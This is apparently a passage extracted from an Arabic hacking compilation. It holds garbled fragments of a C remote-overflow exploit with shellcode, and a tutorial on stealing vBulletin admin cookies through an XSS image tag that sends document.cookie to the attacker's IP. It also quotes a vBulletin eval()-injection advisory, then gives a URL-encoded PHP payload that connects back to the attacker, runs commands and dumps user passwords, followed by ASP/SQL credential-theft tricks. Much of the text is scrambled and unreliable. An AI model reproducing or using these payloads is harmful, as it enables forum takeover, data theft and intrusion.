sin_addr.continue . 0x0a. 0 .(()srand(getpid .("\\\()perror(\\\"connect . SIG_IGN } (for(owned = 0.sin_port = htons(atoi(portp (if(!progress .retaddr. sizeof(sin)) != 0 .1 .sin_family = PF_INET . (struct sockaddr *) & sin.s_addr .((REP_POPULATOR * (1024 + PUT_STRING(\\\"GET / HTTP/1. shellcode.("\\\ .repzero)) + .. 4 . inet_ntoa(ia .sin. 4) || memchr(&victim.("\\\-PUT_STRING(\\\"X ..(memcpy(p.((printf(\\\"%s\\\\n\\\".printf(\\\"[*] Connecting .("\\\printf(\\\"connected!\\\\n p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (victim.("\\\ :"\\\)PUT_STRING . i 295 . i .1 .return -1 { .victim.(sock = socket(PF_INET.((sin.repretaddr * 4) + victim.p += sizeof(shellcode) .("\\\HOST_PARAM \\\"\\\\r\\\\n } (++for (i = 0.1\\\\r\\\\nHost: \\\" .s_addr = ia.retaddr += RET_ADDR_INC /* skip invalid return adresses */ ((if(memchr(&victim.(signal(SIGPIPE. NOP . progress = 0.(PUT_BYTES(PADSIZE_3.. PADDING_3 . i < REP_SHELLCODE.retaddr.(fflush(stdout } (if(connect(sock.sin. i < REP_POPULATOR. 0x0d.(PUT_BYTES(NOPCOUNT. sizeof(shellcode) .("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0. SOCK_STREAM.(exit(1 { (if(!progress .

("\\\ "\\\)printf . PADDING_2 .retaddr >> 16) & 0xff* .("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n .1.retaddr (++ for(i = 0..p++ = (victim.(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\".p++ = victim.p++ = (victim.repzero.(snprintf(buf. j .delta . PADSIZE_2 . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\". (unsigned int)(p .progress = 1 } (if(progress == 1 .(PUT_BYTES(victim.('\\.(PUT_STRING(buf .(PUT_BYTES(PADSIZE_1.expbuf . PADDING_1 .int n .(PUT_STRING(buf } (if(!shown_length .(PUT_BYTES(PADSIZE_2.repretaddr.struct timeval tv 296 . expbuf. 0 .("\\\-PUT_STRING(\\\"X .((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\".++progress (if((progress%70) == 0 .p++ = (victim.(write(sock.expbuf .retaddr >> 8) & 0xff* . sizeof(buf) .("\\\PUT_STRING(\\\"\\\\r\\\\n { . j < victim.retaddr & 0xff* .retaddr >> 24) & 0xff* { . i < 40.shown_length = 1 { .responses = 0 } (while (1 . \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".'\\)putchar { else .("\\\ :"\\\)PUT_STRING } (++for (j = 0.(fflush(stdout .(snprintf(buf. victim. sizeof(buf) . victim. i .("\\\printf(\\\"\\\\n (if(bruteforce .1.('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p . p .fd_set fds .

&fds .repretaddr. 1 .delta.owned = 1 . NULL.responses = 0 (if(responses >= 2 } .((write(sock.1)) < 0 .("\\\ :now .(FD_SET(0.tv. buf. victim. &fds. cmdz. &fds (if((n = read(0. victim. delta=%d. n { { (if(!owned 297 . sizeof(buf) .(exit(1 .tv. \\\"O\\\". NULL. owned? NULL : &tv) > 0 } ((if(FD_ISSET(sock.(FD_ZERO(&fds . buf. repretaddr=%d. victim. n { { } ((if(FD_ISSET(0.(write(sock. i < n. sizeof(buf } (if(select(sock + 1. so nothing will happen .(write(sock. i ('\\if(buf[i] == \\'G . sizeof(buf) . buf.repzero printf(\\\"Experts say this isn\\'t exploitable. strlen(cmdz printf(\\\" it\\'s a TURKEY: type=%s.(write(1.type.tv_usec = 0 .(FD_SET(sock. &fds (if((n = read(sock. repzero=%d\\\\n\\\".++ responses else ..tv_sec = sc_timeout .1)) < 0 . 0.(fflush(stdout { else { . buf. &fds .break (if(n >= 1 } (if(!owned } (++ for(i = 0. retaddr=0x%lx. victim. .(victim.retaddr.((memset(buf.

hehehe!\\\\n .(free(expbuf . \\\"Ooops.return -1 { { .com ‫)) قد تم تجريبها وإختبارها من قبل‬ ‫وهذي وصلة تنزيل البرنامج‬ http://www.com/?show=tools&action=info&id=19 ،،،‫انتهى‬ 298 .(close(sock (if(owned ..break { .return 0 { (( ‫ قبل وضعها لكم هنا‬angels-bytes.return 0 } (if(!bruteforce .angels-bytes.("\\\fprintf(stderr..

"PASSWORD = "Password$‬‬ ‫‪} (function error ($error_message‬‬ ‫‪".exit‬‬ ‫{‬ ‫( && )‪if ( (!isset($PHP_AUTH_USER)) || ! (($PHP_AUTH_USER == $LOGIN‬‬ ‫‪} ( (( "$PHP_AUTH_PW == "$PASSWORD‬‬ ‫‪.‬‬ ‫‪-2‬مي لوحة التحكم بكلمة سر أي إفتح ملف ‪ index.("<font></p/‬‬ ‫{‬ ‫?<‬ ‫مع تغيير كلمتي‬ ‫‪User‬‬ ‫و‬ ‫‪Password‬‬ ‫‪299‬‬ .(""header("WWW-Authenticate: Basic entrer="Form2txt admin‬‬ ‫‪.‬ ‫‪.("header("HTTP/1.echo $error_message‬‬ ‫".php‬الموجود بـمجلد ‪ admin‬بواسطة المفكرة و‬ ‫أضف عليه كود كلمة السر الذي هو ‪/‬‬ ‫>?‪php‬‬ ‫‪.‫" حماية المنتديات "‬ ‫>ةةةةة<‬ ‫الكل يعرف لغة ‪ php‬و التي يصمم بها المنتديات و الكل يعرف أيضا أنها مليئة بالثغرات الكبيرة‬ ‫إليك مدير أي منتدى ) ‪ ( vb‬بعض الساسيات التي يتم بها حماية منتداك ‪/‬‬ ‫‪ً-1‬ل و قبل كل شيء المدير العام ضع مديرين إثنين واحد تكتب فيه المشاركات و تعديل المنتدى و كل شيء‬ ‫و الخر للحتياط عندما يسرق المدير العام ‪."LOGIN = "User$‬‬ ‫‪.0 401 Unauthorized‬‬ ‫‪<error("<p align=right><font face=Tahoma size=2 color=Red‬ليس من حقك‬ ‫الدخول إلى هذه الصفحة>‪.

.‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المنتديات من نوع ‪" vBulletin2... ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document.‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .0‬‬ ‫>ةةةةة<‬ ‫‪--------‬‬‫مقدمة ‪:‬‬ ‫‪--------‬‬‫الموضوع ‪ :‬اختراق الـ ‪vBulletin‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.‬إجعله فقط يخدم الصور أما الفلش و الصوت فل ‪.‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ ..‬‬ ‫‪300‬‬ .‬‬ ‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪..</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ .‬لماذا ؟؟‬ ‫لنه يوجد كود هتمل يفسد جميع المواضيع التي تعتمد على هذه اللغة ‪.‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪. HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ .‫‪-3‬غ قائمة العضاء لماذا ؟؟ مثل لو كان لديك ‪ 3000‬عضو ووضع الزائر الكريم قائمة العضاء و قعد‬ ‫يفحط به أصبح هناك ضغط كبير على المنتدى قد تسألوني لماذا ل نلغي قائمة البحث !! لن البحث في النسخ‬ ‫الجديدة يكون بأكثر من ثلث أحرف و بهذا لن يكون هناك أي ضغط ‪.‬‬ ‫‪ -4‬تكثر فتح لغة ‪ HTML‬في المنتديات أي إفتحها بمنتدى واحد أو إثنين فقط لوجود الضرورة ‪ .2..‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.write('<img‬‬ ‫‪<src="http://my_ip_address/'+document.‬‬ ‫‪-5‬توقيع و ما أدراك ما التوقيع ‪ .cookie+'">'.

%20bbthreadview[54‬‬ ‫‪%20bblastvi..%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622...‬لذا كن حذرا واغلق هذه المنافذ ‪..‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ .com/vb/index.‬‬ ‫اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء ‪! ...2...‬‬ ‫مثال لو كان السيرفر اباتشي ‪ . Dont' be Lamer‬‬ ‫تاريخ اكتشاف الثغرة ‪2002 ..‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86. Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪.‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ .‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪.1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ .1 .31 :‬‬ ‫تم تجربتها على الصدار ‪ 2.‬‬ ‫انتهى‪،،،‬‬ ‫‪301‬‬ ..‬‬ ‫‪..%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8.... Be Secret .0‬وهي تعمل بنجاح ‪..‬ثم اذهب الى اداة ‪ ..‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ .‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ .‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪...‬‬ ‫‪-----------‬‬‫الحل‬ ‫‪----------‬‬‫للحماية من هذه الثغرة قم باغلق الـ ‪ HTML‬في )المنتدى ‪ +‬الرسائل الخاصة ‪ +‬التواقيع ‪ +‬التقويم‬ ‫‪( .php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (.. IMG‬لنه ببساطة بامكانك استخدامه بدل كلمة >‪ <script‬فاذا وضعت >‪<img‬‬ ‫او >‪ <Demon‬او‬ ‫اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ‪ ..‬بهذا الشكل‬ ‫?‪http://www...‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪. +‬‬ ‫)واي منفذ يمكن من خلله وضع كود ‪ HTML‬باي صورة كانت (‬ ‫كما يجب اغل كود الـ ‪ .victim. Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ .

org/index.vbulletin.php‬‬ ‫‪<topic=<script>alert(document.‫"درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها"‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة ةةةةةة<‬ ‫الدرس يتكون من ‪ 7‬نقاط‬ ‫‪ 1‬المنتديات وانواعه‬ ‫‪2‬طريقة اختراقه‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫‪4‬سرفرات الويندوز ودوره في اختراق المنتديات‬ ‫‪ 5‬النسخه المنتشره في النت ودور المعربين العرب وحقيقة الموضوع وتعريبهم‬ ‫‪6‬الحمايه من المخترقين بنسبة ‪ %80‬لاجهزتكم ومنتدياتكم‬ ‫‪ 7‬المجله بجميع نسخه قابل لالختراق‬ ‫الدروس جميعها بالصورة وحقائق ودلئل‬ ‫قمت بتجميع الدروس والضافتة عليه وتعديله ‪%100‬‬ ‫ارجو عدم نقل الدروس وكوبي‬ ‫****************‬ ‫‪ 1‬المنتديات وانواعه‬ ‫المنتديات اول منتديات جون ‪ Powered by: vBulletin‬بجميع اصداراته‬ ‫‪ 1‬لماذا لم يخترق احدي منتداهم حتي الن‬ ‫‪2‬اليوجد لهم مليون عدو‬ ‫‪ 3‬اليخترقون عشرات المنتديات يوميا ولماذا ليس منتدي جون وحمايته تصل الي ‪ %60‬في السرفر‬ ‫تفضل هذا ثغرات بموقعهم اشوي شغل كمان تصل لقلبهم لاريد التطويل الن بس مثال لمن يفهمه‬ ‫?‪http://www.cookie)</script‬‬ ‫‪302‬‬ .

exploitable under any OS or platform DETAILS ======= vBulletin templates are implemented in the following way: the gettemplate() function in global. With an URL crafted in a certain way./.php&topic=.vbulletin. The bug does not involve buffer overrun or other platform-dependant issues..org/index.vbulletin. If we take index. so it's presumably . there's this code 303 .. This could be somewhat safe as long as the parameters to eval() are under strict control.1. Unfortunately this is where vBulletin fails./.the board vBulletin templates are parsed with the eval() function. a remote user may control the eval() parameters .php for :an example. One of its key features is use of templates which allow the board administrator to dynamically modify the look of ../.. The code is then passed to eval()./etc/passwd ******************** ‫طريقة اختراقه‬ ‫جميع الصدارات‬ ‫ بتذكرو يمكن بعضكم‬113 ‫فلنبدي من صفر نسخة‬ ‫ وهذا‬، ‫ وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الحيان‬، ‫كلنا نعرف منتديات الفي بي‬ ‫المنتدى هو المعروف عندنا العرب بكثره‬ Jouko Pynnonen (‫الول اللي كتبته الفرنسي )على ما أعتقد‬ vBulletin (http://www..php?| =forum/view.php is used to fetch a template from database. The configuration files are accessible for the web server so the user can in any case access the MySQL database .system written in PHP./././. typically "nobody".2 http://www.0 beta 2. start an interactive shell and try to elevate their privilege.5 and 2..containing the forums and user information According to the authors the vulnerability exist in all versions of vBulletin up to 1.and inject arbitrary PHP code to be executed A remote user may thus execute any PHP code and programs as the web server user..com/) is a commonly used web forum .

"with the words "hello world The eval() call above will execute .(template=str_replace("\"". but just a blank page .return $template { For effectiveness the function implements a simple cache for template strings.site.<"largefont> with <font size="10> :The gettemplate() function is defined in global.("'". such as replace .php? action=faq&templatecache[faq]=hello+world With this URL."\\\"". After fetching them from the database they're stored in the templatecache[] array.url/index.("eval("echo dovars(\"". addslashes($templatename .} ("if ($action=="faq .$DB_site } (""=![if ($templatecache[$templatename .a user can pass array contents in the URL.$template$ { . you won't get the FAQ page.[template=$templatecache[$templatename$ } else { gettemp=$DB_site->query_first("SELECT template FROM template$ .(".gettemplate("faq { The dovars() function does some variable replacing.g (for simplicity not %-escaped) http://www.global $templatecache.php } (function gettemplate($templatename.("\". This array is checked for the template before doing the SQL query.$escape=1 gets a template from the db or from the local cache // .("echo dovars("hello world 304 . Unfortunately the array is never initialized.(WHERE title='".templatecache[$templatename]=$template$ { } (if ($escape==1 .[template=$gettemp[template$ . so . e.

0.3)).site.php3? action=simplesearch&query=searchthis&templatecache[standardredirec t]="%29%3B%24fa="<%261".php?acti. %24va). If your vBulletin board produces an error message .ypass&url=hello"world :and a similar one in the Lite version http://www.php could end up executing code like .3).set_time_limit(substr("900". so further details about exploitation aren't necessary.su bstr("vhak1. The commercial versions are vulnerable too.0.IP.3)).url/search.%26%24errstr. %24fp=fsockopen(substr("IP.0.As if this wouldn't be bad enough.or%20press%20return %20for %20command%20line" .if(!%24fp) {}else{%24arr[200].substr("900" .php? acti..it's definitely vulnerable The above example works with the "Lite" version.0.fputs(%24fp.0. Quotation marks aren't always escaped as seen in the code above.g http://www. %26%24errno.substr("90".fputs(%24fp.d%20downloads%20database.s&templatecache[standardredirect]=hello"world ، ‫ تنفذ في السيرفر‬url ‫ من الكلم هذا أنت ممكن ترسل أكواد خلف‬، ‫تعرفون الكلم هذا ول داعي لترجمه‬ : ‫ جرب مثل‬، ‫ الغبيه‬hello+world ‫تضعها بدل الكلمه‬ vb 113 or 115 ‫ ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه‬-1 (‫ عندك في جهازك )طريقه فتح البورت تكون على مجازك‬90 ‫ أفتح البورت‬-2 ‫ هذا الى السيرفر‬url ‫ أرسل الـ‬-3 search. but details may differ.with an URL like the one above prefixed with a single quotation mark . e. in which case index. It doesn't take a rocket scientist to figure out how a remote user could execute arbitrary code from here.url/member.12).2).IP.0.if 305 ... a remote user may as well pass a value containing quotation marks and other symbols.%20..63)).IP".%24va=fgets(%24fp.have an eval() problem with URL redirecting. After a little experimenting on the Jelsoft's test site I found some of the commercial versions also .("echo dovars("hello"world This would produce a PHP error message due to unbalanced quotes.site.

strlen(%24serve‬‬ ‫‪rname)).%24ir< sizeof(%24arr).fputs(%24fp.‬‬ ‫‪php3".substr("%24dbusername".echo%28‬‬ ‫‪By Kill -9‬‬ ‫لحظ ‪ IP.for(%24ir=substr("0".strlen(%24dbname)).fp‬‬ ‫‪uts(%24fp.2x‬‬ ‫شفرت ولكن كسرتها وقريبا أقول لك عنها‬ ‫تم شرح طريقة الختراق من ‪ 113‬الي ‪11‬‬ ‫طريقة اختراق من ‪ 115‬الي ‪225‬‬ ‫المتطلبات ‪) WebServer :‬تركيب سيرفر على جهازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.com‬و‬ ‫طريق السلم و الثقافه ‪.‬‬ ‫)‪%24arr).%24str=exec(fgets(%24fp...0.substr("%‬‬ ‫‪24dbpassword" .strlen(%24dbusername)).%24currenta=mysql_db_qu‬‬ ‫*‪ery(substr("%24dbname".while(%24res=mysql_fetch_array‬‬ ‫‪%20(%24curre‬‬ ‫))‪nta‬‬ ‫‪{fputs(%24fp.%24arr[%24‬‬ ‫‪_ir])."%24res[password].%24va).‬‬ ‫‪306‬‬ .0.17)).substr("select%20‬‬ ‫‪%20from%20user" .1‬يكون طوله ‪9‬‬ ‫ممكن أنت تخترع كود ثاني وترسله وتلحظ أنه يتنفذ ‪ ،‬ممكن ترسل كود يسجل لك أدمين ‪ ،‬هذا مثل ما صار‬ ‫في ‪) arabteam2000.18)).1).fputs(%24fp.%24ir%2B%2B‬‬ ‫‪{fputs(%24fp."%24res[usergroupid].0.0.IP‬هذه تحط مكانها رقم الي بي حقك ‪ ،‬ثم الحظ بعدها وجود الرقم ‪ 12‬وهذا تغيرها على‬ ‫طول رقم الي بي ‪ ،‬مثل ‪ 127.0.3)).}die(vhak‬‬ ‫‪"finished_execution).fputs(%24fp.0."%24res‬‬ ‫‪%24arr).0.include(substr("admin/config.}}fclose(%24fp).‬وكثير من المنتديات ‪ ،‬بهدف التحذير وليس التخريب ‪ ،‬وواضح أنه عمل بسيط‬ ‫يحتاج لشويه من التفكير ‪ ،‬أعتقد أهليز زمان صار فيه ‪ ،‬ولكن مسحت الداتالبيس وهذا سهل للغايه‬ ‫طريقه قديمه نوعا ما ‪ ،‬وحطيتها للي حب يجرب فقط !!‬ ‫وأعذروني على الملء والنحو‬ ‫ملحظه أخيره ‪ :‬وهي عند ما تشبك مع السيرفر عن طريق البورت ‪ 90‬أرسل‬ ‫‪d downloads‬‬‫تنزل لك الداتبيس كلها ‪ ،‬وللسف طلعت غير مشفره وهذا يدل على التخلف ‪ ،‬ولكن في الصداره ‪2.0.substr("128".").IP.").16)).0.0.php"."%24res[userid].com‬أصدقائي طبعا( من باب التنبيه ‪ ،‬وكمان صار في ‪ c4arab.‫))‪strlen(%24va)>1‬‬ ‫‪{include(substr("admin/config.").0.mysql_connect(substr("%24servername".strlen(%24dbpassword))).IP.

‬اين الباسورد ؟؟‬ ‫الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها ‪ .‬اذن مالحل ؟‬ ‫قم بنسخ الكود الذي وجدته والصقه في المتصفح ‪ .1012444064=[20‬‬ ‫‪sit=1011983161‬‬ ‫فكر قليل الن ‪ ..‬إلخ‬ ‫ابحث عن الكود الخاص بالباسورد ‪ .‬أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل‬ ‫المنتدى يستقبل‬ ‫بيانات من مكان خاطيء ‪ .‬‬ ‫وبعد ان تتم العملية بنجاح قم بفتح ملف الـ ‪ Log‬الخاص بالسيرفر الذي يحتويه جهازك ‪.com/vb/index...‬‬ ‫‪---------‬‬‫الثغرة ‪:‬‬ ‫‪--------‬‬‫تنقسم طريقة العمل الى عدة اقسام ‪ .‫المستوى ‪ :‬متوسط‬ ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تجربها على انواع اخرى من المنتديات ‪..%20sessionhash=a‬‬ ‫‪4719cd620534914930b86839c4bb5f8.‬‬ ‫مثال لو كان السيرفر اباتشي ‪ ..‬مثال ‪:‬‬ ‫‪GET/ bbuserid=86... HTML‬‬ ‫قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ ‪ .‬بهذا الشكل‬ ‫?‪http://www.</script‬‬ ‫مع ملحظة تغير الـ ‪ IP Adress‬الى رقم الـ ‪ IP‬الخاص بك ‪.‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪. ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬ ‫هذا الكود ‪:‬‬ ‫>‪script>document.cookie+'">'...php‬‬ ‫‪[bbuserid=[userid]&bbpassword=[password hash‬‬ ‫‪307‬‬ .victim. Acces Log‬‬ ‫ستجد جميع الوامر التي طلبتها من السيرفر ‪ ..‬ثم يقوم السكربت بتحويل هذه السطور‬ ‫الى رقم‬ ‫الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل ‪ IIS‬او ‪Apache‬‬ ‫او غيرها ( ‪..‬‬ ‫وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في‬ ‫جهاز وقراءة جزء‬ ‫من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ‪ .write('<img‬‬ ‫‪<src="http://my_ip_address/'+document.‬فتاح المجلد ‪ Apche‬واختر ‪ logs‬واختر ‪.%20bbpassword=dd6169d68822a116cd97e1fb‬‬ ‫‪ddf90622.%20bbthreadview[54‬‬ ‫‪%20bblastvi..

‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال ‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql.+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪308‬‬ .‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح ‪. Forgot Password‬وعندها تستطيع استقبال بريد‬ ‫يحتوي باسورد الدمن ‪..‫ستجد عبارة ‪ " :‬أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز‪" (....‬ثم اذهب الى اداة ‪ ... Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪..‬اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى‬ ‫بريدك الخاص‬ ‫وثم قم بتسجيل الخروج ‪ ...‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr.‬‬ ‫لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ‪ ..‬‬ ‫في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ‪.‬‬ ‫*******************‬ ‫‪ 3‬أختراق الــــ ‪SQL‬‬ ‫يمكنك استخدام برنامج العقرب بيكون اسرع لمن لديه نسخ منه‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من البيانات التى تحتويها ‪.

htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global. line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc.‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪.‫‪http://target/page.CreateObject("ADODB.DATABASE=moe_dbs".asa‬‬ ‫‪309‬‬ .SERVER=xxx.inc‬‬ ‫>!‪<--"include file = "database.+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ ...‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database..Open "DRIVER=SQL‬‬ ‫‪Server.Connection‬‬ ‫‪DB.UID=sa.inc. "6666666‬‬ ‫‪<%‬‬ ‫‪-----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪------------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫>‪%‬‬ ‫‪("Set DB= Server. "_LinuxRay".APP=Microsoft (R) Developer‬‬ ‫‪"Studio.WSID=xxx.asp+.PWD=.

asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ .0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.asa‬‬‫‪milion.‬‬ ‫لقد اقتربنا من النهاية ‪ .htr‬‬ ‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6..2‬اسم المستخدم في ‪User Name‬‬ ‫‪ .asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر ‪.asa‬‬ ‫‪global.‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ .asa++‬‬ 